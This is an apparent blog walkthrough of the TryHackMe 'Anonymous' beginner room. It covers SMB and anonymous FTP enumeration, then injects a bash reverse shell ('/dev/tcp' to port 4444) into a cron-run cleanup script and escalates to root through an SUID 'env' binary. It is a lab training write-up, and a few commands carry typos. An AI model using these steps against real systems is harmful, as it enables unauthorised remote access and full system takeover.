cybersec-k

View on GitHub

Anonymous TryHackMe Writeup/Walkthrough

Not the hacking group

Try to get the two flags! Root the machine and prove your understanding of the fundamentals! This is a virtual machine meant for beginners. Acquiring both flags will require some basic knowledge of Linux and privilege escalation methods.

Scan the machine.

If you are unsure how to tackle this, I recommend checking out the Nmap Tutorials by Hack Hunt.

nmap -sV -Pn <IP>

Open Ports

Looks like we have four ports open: 21, 22, 139, 445.

As SAMBA port is open. Run the SAMBA enumeration scripts. Add command --script=smb-enum-shares.nse,smb-enum-users.nse

Samba Result

pics share is open and we have a read access to it.

Let’s connect to PICS shares and see what we have there! CMD -> smbclinet //<IP>/pics

SMB Connect

When asked for password, press enter.

There are two files available. Let’s download these files to our machine and check the content.

Get Files

These are just images, but what if it has data hidden! I tried steghide to extract the content but it requires passphrase.

Let’s try to connect via ftp and check if we can get the passphrase. Use credentials anonymous:anonymous to login.

FTP Login

FTP Files

I found three files here. Let’s get this files in our machine and check the content.

Get Files

Clean.sh content

Seems like file is running periodically as a cronjob. Oh, now the remove.sh’s content make sense.

We can add a bash one linear in this file and upload it back to the target machine. CMD -> bash -i >& /dev/tcp/<IP>/4444 0>&1

Append Data

Start a listener using netcat. CMD -> nc -lvnp 4444.

Upload the file back to the target machine using put.

Upload Files

Wait for a while and you will receive a shell.

Got Shell

Now that we have the access, let’s stabilize the shell.

Shell Stable CMDs

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256-color

Press Ctrl + Z

stty raw --echo
fg

As we have the access, we can get the user flag.

User Flag

For basic enumeration, you can download linPeas and run it. It will do all your work. Or you can do it manually.

The user is in lxd group, that can be use to exploit. Reference

Check for SUIDs using find / -perm -type f -exec ls -la {} 2>/dev/null \; | grep "/usr/bin"

SUIDs

Search these one by one on GTFOBins.

I got shell with env. CMD -> /usr/bin/env /bin/sh -p

Root Access

You know what to do next :stuck_out_tongue_winking_eye:

Root Flag